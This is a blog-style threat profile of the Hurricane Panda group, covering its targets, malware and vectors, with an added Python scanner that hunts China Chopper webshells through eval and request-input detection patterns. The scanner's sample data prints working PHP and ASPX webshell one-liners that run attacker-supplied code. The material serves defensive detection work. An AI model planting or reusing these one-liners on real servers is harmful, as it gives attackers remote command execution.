Saturday, August 25, 2018

HURRICANE PANDA

Status: Inactive since Fall 2015

Other Names: Operation Umbrella Revolution, Operation Poisoned Hurricane

Active Since/Discovered: 2013

Last Report: December 2015

Targets: Telecommunications and technology companies. Seeks confidential data and intellectual property.

Target Sectors: internet services, engineering, and aerospace

Malware:
-RATs – Sakula, Gh0st, PlugX, Hikit
-Credential theft – Mimikatz
-Webshell RAT – Chopper (China Chopper) webshell
--A roughly 70-byte text file consisting of a single eval() call that runs whatever the attacker sends in the HTTP request; the string is trivial to obfuscate, so matching the exact one-liner is unreliable
--Gives the attacker full command execution and file upload/download through the compromised web server
--Typically planted on the web server through an SQL injection or WebDAV vulnerability
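
The Chopper entry above describes the artifact a defender hunts for: a tiny server-side file whose only job is to eval() request data. The scanner below is an added example written for this post, not code from the original write-up or from any vendor report. It flags files that feed request input (PHP superglobals, ASP.NET Request, JSP getParameter) into eval() or assert(), catches the common "decode the payload first" wrapper, and, because a Chopper shell is only tens of bytes, treats any very small file that evaluates code as high severity. All sample files, the 200-byte threshold, and the pattern names are constructed for illustration; the ASPX sample is about 70 bytes, in line with the size the post quotes.

```python
"""Hunt for China Chopper style webshells under a web root.

Added example for this post, not code from the original write-up. The
detection rules, the size threshold and every sample file below are
constructed here for illustration; tune them before relying on them.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Chopper-class shells are tiny (the post describes a ~70-byte eval() file).
# Anything this small that evaluates code is suspicious on its own.
SMALL_FILE_BYTES = 200  # assumed threshold, not from the post
WEB_EXTENSIONS = (".php", ".phtml", ".asp", ".aspx", ".ashx", ".jsp", ".jspx")

# Request-supplied input in PHP, ASP.NET and JSP.
REQUEST_INPUT = (
    r"\$_(?:POST|GET|REQUEST|COOKIE)\b"
    r"|Request(?:\.Item|\.Form|\.QueryString)?\s*[\[\(]"
    r"|request\.getParameter\s*\("
)
# Decoders commonly wrapped around the payload to defeat a plain grep for eval($_POST.
DECODERS = r"\b(?:base64_decode|str_rot13|gzinflate|gzuncompress|hex2bin|strrev)\s*\("
# eval() itself, plus assert(), which executes string arguments in PHP < 8.
CODE_EVAL = r"\b(?:eval|assert)\s*\("

PATTERNS = {
    # eval(...) or assert(...) fed request data inside the same statement
    "eval_of_request": re.compile(CODE_EVAL + r"[^;]{0,120}?(?:" + REQUEST_INPUT + r")", re.I),
    # a decoder fed request data, e.g. base64_decode($_POST['z'])
    "decoder_of_request": re.compile(DECODERS + r"[^;]{0,120}?(?:" + REQUEST_INPUT + r")", re.I),
    # the error-suppressed @eval( used by the PHP Chopper one-liner
    "silenced_eval": re.compile(r"@\s*eval\s*\(", re.I),
    # the JScript form: eval(<request data>, "unsafe") runs with full trust
    "jscript_unsafe_eval": re.compile(r'\beval\s*\([^)]*,\s*"unsafe"\s*\)', re.I),
}
STRONG_HITS = {"eval_of_request", "decoder_of_request", "jscript_unsafe_eval"}


@dataclass
class Finding:
    path: str
    size: int          # bytes
    hits: List[str]    # pattern names that matched, in PATTERNS order
    severity: str      # "high" or "medium"


def scan_content(path: str, content: str) -> Optional[Finding]:
    """Return a Finding if the file looks like a Chopper-class shell, else None."""
    hits = [name for name, rx in PATTERNS.items() if rx.search(content)]
    if not hits:
        return None
    size = len(content.encode("utf-8", "replace"))
    # Direct request-to-eval flow is high; so is any code-evaluating file small
    # enough to be a dropped one-liner. A lone @eval in a larger file is medium.
    severity = "high" if (STRONG_HITS & set(hits) or size < SMALL_FILE_BYTES) else "medium"
    return Finding(path, size, hits, severity)


def scan_tree(files: Dict[str, str]) -> List[Finding]:
    """Scan an in-memory {path: content} map (used for the constructed samples)."""
    return [f for f in (scan_content(p, c) for p, c in files.items()) if f]


def scan_directory(root: str) -> List[Finding]:
    """Walk a real web root, reading only files with server-side extensions."""
    findings: List[Finding] = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    content = fh.read()
            except OSError:
                continue
            finding = scan_content(path, content)
            if finding:
                findings.append(finding)
    return findings


# Constructed samples, not real captures. The first two are the canonical PHP
# and ASPX one-liners; the next two split the request read from the eval to
# defeat a naive grep; the fifth is a larger file with a local @eval; the
# last handles request input without evaluating it.
SAMPLE_FILES = {
    "upload/img.php": "<?php @eval($_POST['pass']); ?>",
    "wwwroot/err.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "upload/logo.php": "<?php $z=$_REQUEST['z']; @eval(base64_decode($z)); ?>",
    "cache/tmp.php": "<?php $c=base64_decode($_POST['c']); assert($c); ?>",
    "lib/template.php": "<?php\n// " + "x" * 250 + "\n@eval($compiled_template);\n",
    "index.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
}

if __name__ == "__main__":
    for f in scan_tree(SAMPLE_FILES):
        print(f"{f.severity:6} {f.size:4}B {f.path}: {', '.join(f.hits)}")
```

Run it as-is to see the five findings, or call scan_directory() on a web root. The size rule is what catches the indirected sample (`$z=$_REQUEST['z']; @eval(base64_decode($z));`): no single pattern ties the request read to the eval, but a 53-byte file that evaluates code has no legitimate reason to exist. Pair this with the post's delivery note: a new small file under an upload directory or a WebDAV-writable path, appearing in the web server access log right after an SQL-injection-shaped request, is the timeline to look for.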

Preferred Attack Vectors: zero-day vulnerabilities; a DNS resolution exploitation technique; a unique toolkit; and SQL injection vulnerabilities

